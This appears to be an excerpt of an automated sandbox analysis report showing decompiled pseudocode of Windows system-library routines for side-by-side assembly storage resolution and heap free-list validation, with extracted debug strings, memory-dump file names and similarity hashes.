                                                                                                                                                    				short _t294;
                                                                                                                                                    				signed int _t295;
                                                                                                                                                    				void* _t296;
                                                                                                                                                    
                                                                                                                                                    				_t173 =  *0xa02088; // 0x7745a8fa
                                                                                                                                                    				_v8 = _t173 ^ _t295;
                                                                                                                                                    				_t175 = _a4;
                                                                                                                                                    				_t272 = _a8;
                                                                                                                                                    				_v1132 = _a16;
                                                                                                                                                    				_v1140 = _a20;
                                                                                                                                                    				_v1160 = 0;
                                                                                                                                                    				_v1158 = 0x208;
                                                                                                                                                    				_v1156 =  &_v1064;
                                                                                                                                                    				_t282 = 0;
                                                                                                                                                    				_t288 = 0;
                                                                                                                                                    				_t286 = _a12;
                                                                                                                                                    				_v1164 = _t175;
                                                                                                                                                    				_v1069 = 0;
                                                                                                                                                    				_v1068 = 0;
                                                                                                                                                    				_v1136 = 0;
                                                                                                                                                    				_v1088 = 0;
                                                                                                                                                    				_v1086 = 0;
                                                                                                                                                    				_v1084 = 0;
                                                                                                                                                    				_v1128 = 0;
                                                                                                                                                    				_v1126 = 0;
                                                                                                                                                    				_v1124 = 0;
                                                                                                                                                    				_v1144 = 0;
                                                                                                                                                    				if(_t175 == 0) {
                                                                                                                                                    					_t282 = 0;
                                                                                                                                                    					L66:
                                                                                                                                                    					_push(_t282);
                                                                                                                                                    					_push(_t286);
                                                                                                                                                    					_push(_t272);
                                                                                                                                                    					_push(_t175);
                                                                                                                                                    					L00973F92(0x33, 0, "SXS: %s() bad parameters\nSXS:   Map                : %p\nSXS:   Data               : %p\nSXS:   AssemblyRosterIndex: 0x%lx\nSXS:   Map->AssemblyCount : 0x%lx\n", "RtlpResolveAssemblyStorageMapEntry");
                                                                                                                                                    					_t288 = 0xc000000d;
                                                                                                                                                    					L18:
                                                                                                                                                    					if(_v1069 == 0) {
                                                                                                                                                    						L20:
                                                                                                                                                    						if(_v1084 != 0) {
                                                                                                                                                    							 *0x92e6f0(_v1084);
                                                                                                                                                    						}
                                                                                                                                                    						if(_v1068 != 0) {
                                                                                                                                                    							E0091F9F0(_v1068);
                                                                                                                                                    						}
                                                                                                                                                    						if(_v1136 != 0) {
                                                                                                                                                    							E0092E025(_t272,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v1136);
                                                                                                                                                    						}
                                                                                                                                                    						L23:
                                                                                                                                                    						return E0092E1B4(_t288, 0, _v8 ^ _t295, _t282, _t286, _t288);
                                                                                                                                                    					}
                                                                                                                                                    					L19:
                                                                                                                                                    					_v1120 = _v1144;
                                                                                                                                                    					_v1132(4,  &_v1120, _v1140);
                                                                                                                                                    					goto L20;
                                                                                                                                                    				}
                                                                                                                                                    				if(_t272 == 0 || _t286 < 1 || _t286 >  *((intOrPtr*)(_t175 + 4))) {
                                                                                                                                                    					_t282 =  *((intOrPtr*)(_t175 + 4));
                                                                                                                                                    					goto L66;
                                                                                                                                                    				} else {
                                                                                                                                                    					if( *((intOrPtr*)( *((intOrPtr*)(_t175 + 8)) + _t286 * 4)) != 0) {
                                                                                                                                                    						goto L23;
                                                                                                                                                    					}
                                                                                                                                                    					_t284 =  *((intOrPtr*)(_t272 + 0x18)) + _t272;
                                                                                                                                                    					_t191 =  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0xc)) + _t286 * 0x18 + _t272 + 0x10)) + _t272;
                                                                                                                                                    					_t291 =  *((intOrPtr*)(_t191 + 0x50));
                                                                                                                                                    					_t282 =  *((intOrPtr*)(_t284 + 0x10)) + _t272;
                                                                                                                                                    					if( *((intOrPtr*)(_t191 + 0x50)) > 0xfffe) {
                                                                                                                                                    						_push(_t272);
                                                                                                                                                    						L00973F92(0x33, 0, "SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p\n", _t291);
                                                                                                                                                    						L39:
                                                                                                                                                    						_t288 = 0xc0000106;
                                                                                                                                                    						goto L20;
                                                                                                                                                    					}
                                                                                                                                                    					if(( *(_t191 + 4) & 0x00000010) != 0) {
                                                                                                                                                    						L27:
                                                                                                                                                    						_v1076 =  &_v1160;
                                                                                                                                                    						_t286 =  *((intOrPtr*)(_t191 + 0x18)) + _t282;
                                                                                                                                                    						_v1080 = _t286;
                                                                                                                                                    						if(_t286 == 0) {
                                                                                                                                                    							_t288 = 0xc00000e5;
                                                                                                                                                    							goto L23;
                                                                                                                                                    						}
                                                                                                                                                    						_t193 = E00938342(_t286, 0x5c);
                                                                                                                                                    						_pop(_t272);
                                                                                                                                                    						if(_t193 == 0) {
                                                                                                                                                    							_t288 = 0xc00000e5;
                                                                                                                                                    							goto L20;
                                                                                                                                                    						}
                                                                                                                                                    						_t286 = (_t193 - _t286 >> 0x00000001) + (_t193 - _t286 >> 0x00000001) + 0x00000004 & 0x0000ffff;
                                                                                                                                                    						if(_t286 > 0x208) {
                                                                                                                                                    							if(_t286 > 0xfffe) {
                                                                                                                                                    								goto L39;
                                                                                                                                                    							}
                                                                                                                                                    							_v1086 = _t286;
                                                                                                                                                    							_t200 =  *0x92e6f4(_t286 & 0x0000ffff);
                                                                                                                                                    							_v1084 = _t200;
                                                                                                                                                    							if(_t200 != 0) {
                                                                                                                                                    								_v1076 =  &_v1088;
                                                                                                                                                    								goto L30;
                                                                                                                                                    							}
                                                                                                                                                    							_t288 = 0xc0000017;
                                                                                                                                                    							goto L20;
                                                                                                                                                    						}
                                                                                                                                                    						L30:
                                                                                                                                                    						_t292 = _t286 & 0x0000ffff;
                                                                                                                                                    						E00922340(_v1076[2], _v1080, _t292 - 2);
                                                                                                                                                    						_t272 = 0;
                                                                                                                                                    						 *((short*)(_v1076[2] + (_t292 >> 1) * 2 - 2)) = 0;
                                                                                                                                                    						_t296 = _t296 + 0xc;
                                                                                                                                                    						 *_v1076 = _t286;
                                                                                                                                                    						L15:
                                                                                                                                                    						if(_v1068 == 0) {
                                                                                                                                                    							if(L0093DA3A(_v1076[2],  &_v1128, 0,  &_v1180) == 0) {
                                                                                                                                                    								L00973F92(0x33, 0, "SXS: Attempt to translate DOS path name \"%S\" to NT format failed\n", _v1076[2]);
                                                                                                                                                    								_t288 = 0xc000003a;
                                                                                                                                                    								goto L18;
                                                                                                                                                    							}
                                                                                                                                                    							_v1136 = _v1124;
                                                                                                                                                    							_t215 = _v1180;
                                                                                                                                                    							if(_t215 != 0) {
                                                                                                                                                    								_v1128 = _t215;
                                                                                                                                                    								_v1124 = _v1176;
                                                                                                                                                    							} else {
                                                                                                                                                    								_v1172 = 0;
                                                                                                                                                    							}
                                                                                                                                                    							_v1200 = _v1172;
                                                                                                                                                    							_push(0x21);
                                                                                                                                                    							_v1196 =  &_v1128;
                                                                                                                                                    							_push(3);
                                                                                                                                                    							_push( &_v1212);
                                                                                                                                                    							_push( &_v1204);
                                                                                                                                                    							_push(0x100020);
                                                                                                                                                    							_v1204 = 0x18;
                                                                                                                                                    							_v1192 = 0x40;
                                                                                                                                                    							_v1188 = 0;
                                                                                                                                                    							_v1184 = 0;
                                                                                                                                                    							_t288 = L0091FD74( &_v1068);
                                                                                                                                                    							E0093A331( &_v1180, _t272,  &_v1180);
                                                                                                                                                    							if(_t288 >= 0) {
                                                                                                                                                    								goto L16;
                                                                                                                                                    							} else {
                                                                                                                                                    								_push(_t288);
                                                                                                                                                    								L00973F92(0x33, 0, "SXS: Unable to open assembly directory under storage root \"%S\"; Status = 0x%08lx\n", _v1076[2]);
                                                                                                                                                    								goto L18;
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						L16:
                                                                                                                                                    						_t226 = L0094CC91(_v1164, _a12, _v1076,  &_v1068);
                                                                                                                                                    						_t288 = _t226;
                                                                                                                                                    						if(_t226 < 0) {
                                                                                                                                                    							L00973F92(0x33, 0, "SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx\n", _t288);
                                                                                                                                                    						} else {
                                                                                                                                                    							_t288 = 0;
                                                                                                                                                    						}
                                                                                                                                                    						goto L18;
                                                                                                                                                    					}
                                                                                                                                                    					_v1076 = 0;
                                                                                                                                                    					_t294 =  *((intOrPtr*)(_t191 + 0x50));
                                                                                                                                                    					_v1152 = _t294;
                                                                                                                                                    					_v1150 = _t294;
                                                                                                                                                    					_v1148 =  *((intOrPtr*)(_t191 + 0x54)) + _t282;
                                                                                                                                                    					_v1108 = 0;
                                                                                                                                                    					_v1106 = 0x216;
                                                                                                                                                    					_v1104 =  &_v544;
                                                                                                                                                    					_v1120 = _t272;
                                                                                                                                                    					_v1116 = _t286;
                                                                                                                                                    					_v1112 = 0;
                                                                                                                                                    					_v1100 = 0;
                                                                                                                                                    					_v1092 = 0;
                                                                                                                                                    					_v1096 = 0;
                                                                                                                                                    					_v1132(1,  &_v1120, _v1140);
                                                                                                                                                    					if(_v1092 != 0) {
                                                                                                                                                    						_t288 = 0xc0000120;
                                                                                                                                                    						goto L20;
                                                                                                                                                    					}
                                                                                                                                                    					if(_v1100 != 0) {
                                                                                                                                                    						_t288 = E0094D088(0,  &_v1108,  &_v1152,  &_v1160,  &_v1088,  &_v1076,  &_v1068);
                                                                                                                                                    						if(_t288 >= 0) {
                                                                                                                                                    							_t288 = L0094CC91(_v1164, _t286,  &_v1108,  &_v1068);
                                                                                                                                                    							if(_t288 >= 0) {
                                                                                                                                                    								_t288 = 0;
                                                                                                                                                    								goto L20;
                                                                                                                                                    							}
                                                                                                                                                    							_push(_t288);
                                                                                                                                                    							_push(_t286);
                                                                                                                                                    							_push("SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx\n");
                                                                                                                                                    							L50:
                                                                                                                                                    							_push(0);
                                                                                                                                                    							_push(0x33);
                                                                                                                                                    							L00973F92();
                                                                                                                                                    							goto L20;
                                                                                                                                                    						}
                                                                                                                                                    						_push(_t288);
                                                                                                                                                    						_push( &_v1108);
                                                                                                                                                    						_push("SXS: Attempt to probe known root of assembly storage (\"%wZ\") failed; Status = 0x%08lx\n");
                                                                                                                                                    						goto L50;
                                                                                                                                                    					}
                                                                                                                                                    					_v1144 = _v1112;
                                                                                                                                                    					_t250 = _v1096;
                                                                                                                                                    					_t286 = 0;
                                                                                                                                                    					_v1080 = _t250;
                                                                                                                                                    					_v1069 = 1;
                                                                                                                                                    					if(_t250 <= 0) {
                                                                                                                                                    						L14:
                                                                                                                                                    						if(_t286 == _v1080) {
                                                                                                                                                    							L59:
                                                                                                                                                    							_push(_t286);
                                                                                                                                                    							L00973F92(0x33, 0, "SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries\n",  &_v1152);
                                                                                                                                                    							_t288 = 0xc0150004;
                                                                                                                                                    							goto L19;
                                                                                                                                                    						}
                                                                                                                                                    						goto L15;
                                                                                                                                                    					} else {
                                                                                                                                                    						goto L10;
                                                                                                                                                    					}
                                                                                                                                                    					while(1) {
                                                                                                                                                    						L10:
                                                                                                                                                    						_v1120 = _v1144;
                                                                                                                                                    						_v1108 = 0;
                                                                                                                                                    						_v1106 = 0x216;
                                                                                                                                                    						_v1104 =  &_v544;
                                                                                                                                                    						_v1116 = _t286;
                                                                                                                                                    						_v1112 = 0;
                                                                                                                                                    						_v1111 = 0;
                                                                                                                                                    						_v1132(2,  &_v1120, _v1140);
                                                                                                                                                    						if(_v1112 != 0) {
                                                                                                                                                    							break;
                                                                                                                                                    						}
                                                                                                                                                    						if(_v1111 != 0) {
                                                                                                                                                    							if(_v1108 == 0) {
                                                                                                                                                    								goto L59;
                                                                                                                                                    							}
                                                                                                                                                    							_t159 = _t286 + 1; // 0x1
                                                                                                                                                    							_v1080 = _t159;
                                                                                                                                                    						}
                                                                                                                                                    						if(_v1108 != 0) {
                                                                                                                                                    							if(_v1068 != 0) {
                                                                                                                                                    								E0091F9F0(_v1068);
                                                                                                                                                    								_v1068 = 0;
                                                                                                                                                    							}
                                                                                                                                                    							_t288 = E0094D088(0,  &_v1108,  &_v1152,  &_v1160,  &_v1088,  &_v1076,  &_v1068);
                                                                                                                                                    							if(_t288 >= 0) {
                                                                                                                                                    								goto L14;
                                                                                                                                                    							} else {
                                                                                                                                                    								if(_t288 == 0xc0150004) {
                                                                                                                                                    									goto L13;
                                                                                                                                                    								} else {
                                                                                                                                                    									_push(_t288);
                                                                                                                                                    									_push( &_v1152);
                                                                                                                                                    									L00973F92(0x33, 0, "SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx\n",  &_v1108);
                                                                                                                                                    									goto L19;
                                                                                                                                                    								}
                                                                                                                                                    								goto L27;
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						L13:
                                                                                                                                                    						_t286 = _t286 + 1;
                                                                                                                                                    						if(_t286 < _v1080) {
                                                                                                                                                    							continue;
                                                                                                                                                    						}
                                                                                                                                                    						goto L14;
                                                                                                                                                    					}
                                                                                                                                                    					_t288 = 0xc0000120;
                                                                                                                                                    					goto L19;
                                                                                                                                                    				}
                                                                                                                                                    			}
                                                                                                                                                    0x009853d7
                                                                                                                                                    0x009853e9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009853e9
                                                                                                                                                    0x009853d9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009853d9
                                                                                                                                                    0x009621de
                                                                                                                                                    0x009621de
                                                                                                                                                    0x009621f4
                                                                                                                                                    0x00962204
                                                                                                                                                    0x00962206
                                                                                                                                                    0x00962211
                                                                                                                                                    0x00962217
                                                                                                                                                    0x0094c841
                                                                                                                                                    0x0094c847
                                                                                                                                                    0x0096223e
                                                                                                                                                    0x00985405
                                                                                                                                                    0x0098540d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0098540d
                                                                                                                                                    0x0096224a
                                                                                                                                                    0x00962250
                                                                                                                                                    0x00962259
                                                                                                                                                    0x0098552f
                                                                                                                                                    0x0098553b
                                                                                                                                                    0x0096225f
                                                                                                                                                    0x0096225f
                                                                                                                                                    0x0096225f
                                                                                                                                                    0x0096226b
                                                                                                                                                    0x00962271
                                                                                                                                                    0x00962279
                                                                                                                                                    0x0096227f
                                                                                                                                                    0x00962287
                                                                                                                                                    0x0096228e
                                                                                                                                                    0x0096228f
                                                                                                                                                    0x0096229b
                                                                                                                                                    0x009622a5
                                                                                                                                                    0x009622af
                                                                                                                                                    0x009622b5
                                                                                                                                                    0x009622c0
                                                                                                                                                    0x009622c9
                                                                                                                                                    0x009622d0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009622d6
                                                                                                                                                    0x0098554c
                                                                                                                                                    0x00985558
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0098555d
                                                                                                                                                    0x009622d0
                                                                                                                                                    0x0094c84d
                                                                                                                                                    0x0094c863
                                                                                                                                                    0x0094c868
                                                                                                                                                    0x0094c86c
                                                                                                                                                    0x0098556e
                                                                                                                                                    0x0094c872
                                                                                                                                                    0x0094c872
                                                                                                                                                    0x0094c872
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0094c86c
                                                                                                                                                    0x0094c6f7
                                                                                                                                                    0x0094c6fd
                                                                                                                                                    0x0094c701
                                                                                                                                                    0x0094c708
                                                                                                                                                    0x0094c714
                                                                                                                                                    0x0094c71c
                                                                                                                                                    0x0094c728
                                                                                                                                                    0x0094c735
                                                                                                                                                    0x0094c744
                                                                                                                                                    0x0094c74a
                                                                                                                                                    0x0094c750
                                                                                                                                                    0x0094c756
                                                                                                                                                    0x0094c75c
                                                                                                                                                    0x0094c762
                                                                                                                                                    0x0094c768
                                                                                                                                                    0x0094c774
                                                                                                                                                    0x00985417
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00985417
                                                                                                                                                    0x0094c780
                                                                                                                                                    0x00985451
                                                                                                                                                    0x00985455
                                                                                                                                                    0x0098548e
                                                                                                                                                    0x00985492
                                                                                                                                                    0x0098549d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0098549d
                                                                                                                                                    0x00985494
                                                                                                                                                    0x00985495
                                                                                                                                                    0x00985496
                                                                                                                                                    0x00985464
                                                                                                                                                    0x00985464
                                                                                                                                                    0x00985465
                                                                                                                                                    0x00985467
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0098546c
                                                                                                                                                    0x00985457
                                                                                                                                                    0x0098545e
                                                                                                                                                    0x0098545f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0098545f
                                                                                                                                                    0x0094c78c
                                                                                                                                                    0x0094c792
                                                                                                                                                    0x0094c798
                                                                                                                                                    0x0094c79a
                                                                                                                                                    0x0094c7a0
                                                                                                                                                    0x0094c7a9
                                                                                                                                                    0x0094c835
                                                                                                                                                    0x0094c83b
                                                                                                                                                    0x009854df
                                                                                                                                                    0x009854df
                                                                                                                                                    0x009854ef
                                                                                                                                                    0x009854f7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009854f7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0094c7af
                                                                                                                                                    0x0094c7af
                                                                                                                                                    0x0094c7bb
                                                                                                                                                    0x0094c7c3
                                                                                                                                                    0x0094c7cf
                                                                                                                                                    0x0094c7dc
                                                                                                                                                    0x0094c7eb
                                                                                                                                                    0x0094c7f1
                                                                                                                                                    0x0094c7f7
                                                                                                                                                    0x0094c7fd
                                                                                                                                                    0x0094c809
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0094c815
                                                                                                                                                    0x009854ab
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009854ad
                                                                                                                                                    0x009854b0
                                                                                                                                                    0x009854b0
                                                                                                                                                    0x0094c822
                                                                                                                                                    0x0094d03e
                                                                                                                                                    0x009854c1
                                                                                                                                                    0x009854c6
                                                                                                                                                    0x009854c6
                                                                                                                                                    0x0094d074
                                                                                                                                                    0x0094d078
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0094d07e
                                                                                                                                                    0x009854d7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009854dd
                                                                                                                                                    0x0098550b
                                                                                                                                                    0x00985512
                                                                                                                                                    0x00985522
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00985527
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009854d7
                                                                                                                                                    0x0094d078
                                                                                                                                                    0x0094c828
                                                                                                                                                    0x0094c828
                                                                                                                                                    0x0094c82f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0094c82f
                                                                                                                                                    0x00985501
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00985501

                                                                                                                                                    Strings
                                                                                                                                                    • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 00985496
                                                                                                                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 00985586
                                                                                                                                                    • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 00985566
                                                                                                                                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 009853FD
                                                                                                                                                    • @, xrefs: 009622A5
                                                                                                                                                    • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 009854E7
                                                                                                                                                    • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 0098551A
                                                                                                                                                    • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 0098545F
                                                                                                                                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 00985550
                                                                                                                                                    • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 00985386
                                                                                                                                                    • RtlpResolveAssemblyStorageMapEntry, xrefs: 00985581
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                                    • API String ID: 0-4009184096
                                                                                                                                                    • Opcode ID: 9e5e522afb8ae4ef75f9f0aa2f583a5216ca2cdf94b4048a6b570be0d759b627
                                                                                                                                                    • Instruction ID: 09c7365fae5c2fbb321cd2900f151cb30b007dd4d4e344874905c6ca7dc66b8f
                                                                                                                                                    • Opcode Fuzzy Hash: 9e5e522afb8ae4ef75f9f0aa2f583a5216ca2cdf94b4048a6b570be0d759b627
                                                                                                                                                    • Instruction Fuzzy Hash: 80023CF2D016289FDB60DF54CC80BEAB7B8AF55304F4541EAE609A7212E6309F84CF59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 59%
                                                                                                                                                    			E009D098E(void* __ecx, unsigned int __edx, signed int _a4, char _a8) {
                                                                                                                                                    				signed int _v8;
                                                                                                                                                    				signed int _v12;
                                                                                                                                                    				signed int* _v16;
                                                                                                                                                    				signed int _v20;
                                                                                                                                                    				signed int _v24;
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				void* __edi;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				void* __ebp;
                                                                                                                                                    				signed int* _t165;
                                                                                                                                                    				intOrPtr _t168;
                                                                                                                                                    				signed short _t181;
                                                                                                                                                    				intOrPtr _t183;
                                                                                                                                                    				signed int* _t204;
                                                                                                                                                    				signed int _t209;
                                                                                                                                                    				signed int _t214;
                                                                                                                                                    				signed int* _t216;
                                                                                                                                                    				signed int _t226;
                                                                                                                                                    				signed int _t228;
                                                                                                                                                    				signed int _t233;
                                                                                                                                                    				intOrPtr _t235;
                                                                                                                                                    				intOrPtr _t246;
                                                                                                                                                    				intOrPtr _t257;
                                                                                                                                                    				signed int _t280;
                                                                                                                                                    				signed int* _t281;
                                                                                                                                                    				signed int* _t282;
                                                                                                                                                    				signed short _t284;
                                                                                                                                                    				signed short _t286;
                                                                                                                                                    				signed char _t288;
                                                                                                                                                    				intOrPtr* _t298;
                                                                                                                                                    				signed int _t309;
                                                                                                                                                    				signed int _t310;
                                                                                                                                                    				signed int* _t311;
                                                                                                                                                    				unsigned int _t312;
                                                                                                                                                    				signed int* _t313;
                                                                                                                                                    				signed int _t314;
                                                                                                                                                    				signed int _t315;
                                                                                                                                                    				intOrPtr _t316;
                                                                                                                                                    				signed int _t317;
                                                                                                                                                    				signed int _t318;
                                                                                                                                                    				signed int _t319;
                                                                                                                                                    
                                                                                                                                                    				_t308 = __edx;
                                                                                                                                                    				_t311 = _a4;
                                                                                                                                                    				_v12 = 0;
                                                                                                                                                    				_v8 = 0;
                                                                                                                                                    				_v16 = _t311;
                                                                                                                                                    				if(L009CFB7A(__ecx, __edx, _t311, 0) == 0) {
                                                                                                                                                    					L84:
                                                                                                                                                    					E009D06F9(_v16);
                                                                                                                                                    					_t337 = _v8;
                                                                                                                                                    					if(_v8 != 0) {
                                                                                                                                                    						_a4 = _a4 & 0x00000000;
                                                                                                                                                    						E00934167(_t308, _t337, 0xffffffff,  &_v8,  &_a4, 0x8000);
                                                                                                                                                    					}
                                                                                                                                                    					L48:
                                                                                                                                                    					return 0;
                                                                                                                                                    				}
                                                                                                                                                    				if(_a8 != 0 || (_t311[0x10] & 0x20000000) != 0) {
                                                                                                                                                    					_t308 = 0;
                                                                                                                                                    					_t165 =  &(_t311[0x31]);
                                                                                                                                                    					_t280 =  *_t165;
                                                                                                                                                    					_a8 = 0;
                                                                                                                                                    					_v24 = 0;
                                                                                                                                                    					while(_t165 != _t280) {
                                                                                                                                                    						_t280 =  *_t280;
                                                                                                                                                    						_a4 =  *_t313 & 0x0000ffff;
                                                                                                                                                    						_t288 = _t313[0];
                                                                                                                                                    						_v16 = _t313;
                                                                                                                                                    						__eflags = _t288 & 0x00000001;
                                                                                                                                                    						if((_t288 & 0x00000001) != 0) {
                                                                                                                                                    							_t168 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                    							__eflags =  *(_t168 + 0xc);
                                                                                                                                                    							if( *(_t168 + 0xc) == 0) {
                                                                                                                                                    								_push("HEAP: ");
                                                                                                                                                    								E0097373B();
                                                                                                                                                    							} else {
                                                                                                                                                    								E0097373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                    							}
                                                                                                                                                    							_push(_t313);
                                                                                                                                                    							E0097373B("dedicated (%04x) free list element %p is marked busy\n", _a4);
                                                                                                                                                    							L22:
                                                                                                                                                    							__eflags = _t311[0x13];
                                                                                                                                                    							if(_t311[0x13] != 0) {
                                                                                                                                                    								_t313[0] = _t313[0] ^ _t313[0] ^  *_t313;
                                                                                                                                                    								 *_t313 =  *_t313 ^ _t311[0x14];
                                                                                                                                                    							}
                                                                                                                                                    							goto L84;
                                                                                                                                                    						}
                                                                                                                                                    						_t181 =  *_t313 & 0x0000ffff;
                                                                                                                                                    						__eflags = _t181 - _v24;
                                                                                                                                                    						if(_t181 < _v24) {
                                                                                                                                                    							_t183 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                    							__eflags =  *(_t183 + 0xc);
                                                                                                                                                    							if( *(_t183 + 0xc) == 0) {
                                                                                                                                                    								_push("HEAP: ");
                                                                                                                                                    								E0097373B();
                                                                                                                                                    							} else {
                                                                                                                                                    								E0097373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                    							}
                                                                                                                                                    							E0097373B("Non-Dedicated free list element %p is out of order\n", _t313);
                                                                                                                                                    							goto L22;
                                                                                                                                                    						}
                                                                                                                                                    						_t308 = 0;
                                                                                                                                                    						_v24 = _t181 & 0x0000ffff;
                                                                                                                                                    						__eflags = _t311[0x13];
                                                                                                                                                    						if(_t311[0x13] != 0) {
                                                                                                                                                    							_t313[0] = _t313[0] ^ _t288 ^  *_t313;
                                                                                                                                                    							 *_t313 =  *_t313 ^ _t311[0x14];
                                                                                                                                                    							__eflags =  *_t313;
                                                                                                                                                    						}
                                                                                                                                                    						_t29 =  &_a8;
                                                                                                                                                    						 *_t29 = _a8 + 1;
                                                                                                                                                    						__eflags =  *_t29;
                                                                                                                                                    						_t165 =  &(_t311[0x31]);
                                                                                                                                                    					}
                                                                                                                                                    					_a4 = 0x208 + (_t311[0x22] & 0x0000ffff) * 4;
                                                                                                                                                    					if( *0xa092a4 != 0 && _t311[0x30] != _t308) {
                                                                                                                                                    						_push(4);
                                                                                                                                                    						_push(0x1000);
                                                                                                                                                    						_push( &_a4);
                                                                                                                                                    						_push(0);
                                                                                                                                                    						_push( &_v8);
                                                                                                                                                    						if(E0091FAD0(0xffffffff) >= 0) {
                                                                                                                                                    							_v12 = _v8 + 0x204;
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					_t204 =  &(_t311[0x28]);
                                                                                                                                                    					_t314 =  *_t204;
                                                                                                                                                    					while(_t204 != _t314) {
                                                                                                                                                    						__eflags = _t311[0x13];
                                                                                                                                                    						_t281 = _t314 + 0x18;
                                                                                                                                                    						if(_t311[0x13] != 0) {
                                                                                                                                                    							 *_t281 =  *_t281 ^ _t311[0x14];
                                                                                                                                                    							__eflags = _t281[0] - (_t281[0] ^ _t281[0] ^  *_t281);
                                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                                    								_push(0);
                                                                                                                                                    								_push(_t281);
                                                                                                                                                    								_push(_t311);
                                                                                                                                                    								E009CF8EE(_t281, _t311, _t314, __eflags);
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						_t295 = _v12;
                                                                                                                                                    						__eflags = _t295;
                                                                                                                                                    						if(_t295 == 0) {
                                                                                                                                                    							L39:
                                                                                                                                                    							__eflags =  *(_t314 + 0x1a) & 0x00000004;
                                                                                                                                                    							if(( *(_t314 + 0x1a) & 0x00000004) == 0) {
                                                                                                                                                    								L41:
                                                                                                                                                    								__eflags = _t311[0x13];
